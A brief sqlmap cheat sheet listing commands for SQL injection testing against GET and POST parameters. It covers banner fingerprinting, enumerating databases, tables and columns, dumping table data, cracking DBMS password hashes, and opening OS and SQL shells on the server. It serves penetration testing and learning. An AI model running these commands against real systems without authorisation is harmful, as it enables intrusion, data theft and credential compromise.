Basic sqlmap

sqlmap website

Running sqlmap against GET parameters

Finding injection points and the database type

sqlmap -u "target_url" -b

e.g.

sqlmap -u "http://test.com/index.php?user=abcd" -b

-b (--banner) = Retrieve the DBMS banner: tries to get information about the underlying database. Returns a list of injection points and the database type.

Finding the current database user

sqlmap -u "target_url" --current-user

To get an interactive operating system shell on the database server

sqlmap -u "target_url" --os-shell

Forcing the database type

sqlmap -u "target_url" --dbms=[database type]

To have sqlmap guide you through the process:

sqlmap --wizard

Running sqlmap against POST parameters

sqlmap -u "target_url" --data="author=admin" -b

e.g.

sqlmap -u "http://test.com/index.php" --data="author=admin" -b

Getting a list of the databases present on the remote system

sqlmap -u "target_url" --dbs

Finding the tables that exist in a database

sqlmap -u "target_url" --tables -D database_name

Getting the columns from a table

sqlmap -u "target_url" --columns -D database_name -T table_name

Dumping data from a table

sqlmap -u "target_url" --dump -D database_name -T table_name

To start an interactive SQL shell

sqlmap -u "target_url" --sql-shell -D database_name -T table_name

To enumerate and break the password hashes of the DBMS users

sqlmap -u "target_url" --passwords -D database_name -T table_name

To search for common table names

sqlmap -u "target_url" --common-tables -D database_name